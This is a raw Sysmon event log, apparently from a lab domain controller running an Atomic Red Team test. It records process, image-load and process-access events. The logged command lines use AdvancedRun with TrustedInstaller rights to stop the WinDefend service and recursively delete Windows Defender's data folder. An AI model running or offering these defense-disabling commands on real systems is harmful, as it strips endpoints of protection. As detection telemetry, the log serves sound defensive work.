17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003943686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003943683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB39-61EA-2503-000000002702}47804812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003943680Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.096{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-EB39-61EA-2503-000000002702}4780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003943679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003943676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003943675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB39-61EA-2503-000000002702}47804812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003943674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.091{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-EB39-61EA-2503-000000002702}4780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003943421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:53.858{834264DD-EB39-61EA-2503-000000002702}4780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003942881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:17.109{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003942880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:17.109{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:17.109{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 534500x80000000000000003942863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003942853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942850Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942849Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 